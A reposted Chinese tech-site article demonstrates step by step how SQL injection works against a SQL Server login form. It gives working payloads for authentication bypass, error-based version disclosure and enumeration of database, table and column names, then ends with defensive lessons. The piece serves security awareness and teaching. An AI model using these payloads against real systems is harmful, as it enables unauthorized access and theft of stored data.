≡
  • 网络编程
  • 数据库
  • CMS技巧
  • 软件编程
  • PHP笔记
  • JavaScript
  • MySQL
位置:首页 > 数据库 > SQL Server

SQL注入全过程深入分析

人气:327 时间:2020-04-29

这篇文章主要为大家详细介绍了SQL注入全过程深入分析,具有一定的参考价值,可以用来参考一下。

感兴趣的小伙伴,下面一起跟随四海网的小编两巴掌来看看吧!

本文分析了SQL注入全过程。分享给大家供大家参考,具体如下:

 

初步注入--绕过验证,直接登录

 

公司网站登陆框如下:

【图片暂缺】

可以看到除了账号密码之外,还有一个公司名的输入框,根据输入框的形式不难推出SQL的写法如下:

代码如下:

SELECT * From Table WHERE Name='XX' and Password='YY' and Corp='ZZ'

 

我发现前两者都做一些检查,而第三个输入框却疏忽了,漏洞就在这里!注入开始,在输入框中输入以下内容:

用户名乱填,密码留空,这种情况下点击登录按钮后竟然成功登录了。

【图片暂缺】

我们看一下最终的SQL就会找到原因:

代码如下:

SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp='' or 1=1--'

 

从代码可以看出,前一半单引号被闭合,后一半单引号被 “--”给注释掉,中间多了一个永远成立的条件“1=1”,这就造成任何字符都能成功登录的结果。而Sql注入的危害却不仅仅是匿名登录。

 

中级注入--借助异常获取信息

 

现在我们在第三个输入框中写入:

代码如下:


‘or 1=(SELECT @@version) –

如下:

【图片暂缺】

后台的SQL变成了这样:

代码如下:


SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp=''
or 1=(SELECT @@VERSION)--'

判断条件变成了1=(SELECT @@VERSION),

这个写法肯定会导致错误,但出错正是我们想要的。点击登录后,页面出现以下信息:

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (SP3) - 10.0.5500.0 (X64) Sep 21 2011 22:45:45
Copyright (c) 1988-2008 Microsoft Corporation Developer Edition (64-bit)
on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) ' to data type int.

可怕的事情出现了,服务器的操作系统和SQL Server版本信息竟然通过错误显示出来。

 

危害扩大--获取服务器所有的库名、表名、字段名

 

接着,我们在输入框中输入如下信息:

代码如下:

t' or 1=(SELECT top 1 name FROM master..sysdatabases where name not in (SELECT top 0 name FROM master..sysdatabases))--

 

此时发现第三个输入框有字数长度的限制,然而这种客户端的限制形同虚设,

直接通过Google浏览器就能去除。

【图片暂缺】

点击登录,返回的信息如下:

Conversion failed when converting the nvarchar value 'master' to data type int.

数据库名称“master”通过异常被显示出来!依次改变上面SQL语句中的序号,

就能得到服务器上所有数据库的名称。

接着,输入信息如下:

代码如下:

b' or 1=(SELECT top 1 name FROM master..sysobjects where xtype='U' and name not in (SELECT top 1 name FROM master..sysobjects where xtype='U'))--

 

得到返回信息如下:

Conversion failed when converting the nvarchar value 'spt_fallback_db' to data type int.

我们得到了master数据库中的第一张表名:“spt_fallback_db”,

同上,依次改变序号,可得到该库全部表名。

现在我们以“spt_fallback_db”表为例,尝试获取该表中所有的字段名。在输入框中输入以下代码:

代码如下:

b' or 1=(SELECT top 1 master..syscolumns.name FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='spt_fallback_db');

 

于是,得到错误提示如下:

"Conversion failed when converting the nvarchar value 'xserver_name' to data type int.";

这样第一个字段名“xserver_name”就出来了,依次改变序号,就能遍历出所有的字段名。

 

最终目的--获取数据库中的数据

 

写到这里,我们已知通过SQL注入能获取全部的数据库,表,及其字段,为了防止本文完全沦为注入教程,获取数据的代码就不再描述,而这篇文章的目的也已达到,SQL注入意味着什么?意味着数据库中所有数据都能被盗取。

当知道这个危害以后,是否还能有人对SQL注入漏洞置之不理?

 

结语

 

关于安全性,本文可总结出一下几点:

1. 对用户输入的内容要时刻保持警惕。
2. 只有客户端的验证等于没有验证。
3. 永远不要把服务器错误信息暴露给用户。

除此之外,我还要补充几点:

1. SQL注入不仅能通过输入框,还能通过Url达到目的。
2. 除了服务器错误页面,还有其他办法获取到数据库信息。
3. 可通过软件模拟注入行为,这种方式盗取信息的速度要比你想象中快的多。
4. 漏洞跟语言平台无关。

本文来自:http://www.q1010.com/179/8590-0.html

注:关于SQL注入全过程深入分析的内容就先介绍到这里,更多相关文章的可以留意四海网的其他信息。

关键词:SQL SERVER

您可能感兴趣的文章

  • SQLServer主键和唯一约束的区别
  • SQLSERVER简单创建DBLINK操作远程服务器数据库的方法
  • SqlServer存储过程实现及拼接sql的注意点
  • sqlserver 各种判断是否存在(表名、函数、存储过程等)
  • 将备份的SQLServer数据库转换为SQLite数据库操作方法
  • SQLServer导出sql文件/表架构和数据操作步骤
  • 自动化收集SQLSERVER诊断信息的工具选择及使用介绍
  • SQLSERVER数据库中的5173错误解决方法
  • SqlServer系统数据库的作用深入了解
  • SQLSERVER如何查看索引缺失及DMV使用介绍
上一篇:sql server几种Join的区别测试方法
下一篇:SQL Server 获取服务器时间的sql语句
热门文章
  • SQL Server SQL获取第一条记录的方法
  • SQL Server出现System.OutOfMemoryException异常的解决方法
  • SQL Server的 update from 语句的简单示例
  • SQL Server 数据库备份方法菜鸟教程
  • SQL Server 多表关联时在where语句中慎用trim()方法
  • SQL Server数据类型及长度限制详细说明
  • mybaits非配置原因,导致SqlSession was not registered for synchronization异常解析
  • SQL Server 收缩后对数据库的使用有影响吗?
  • SQL Server 格式导致的Excel导入sql出现异常的解决方法
  • SQL Server 连接服务器出现错误 7391的解决方法
  • 最新文章
    • SQL Server存储过程基本语法的简单示例
    • sql查询时增加自动编号和分页的简单示例
    • sql轻松应付百万数据的高效数据分页存储过程的简单示例
    • sql获取一条数据中所有字段的名称和值的实现方法
    • sql分割函数的简单示例
    • SQL Server异常捕获的简单示例
    • SQL SERVER回滚恢复误操作数据的实现方法
    • SQL Server函数或存储过程中抛出异常的实现方法
    • SQL Server创建数据库的完整代码
    • SQL Server创建数据库的命令用法示例

四海网收集整理一些常用的php代码,JS代码,数据库mysql等技术文章。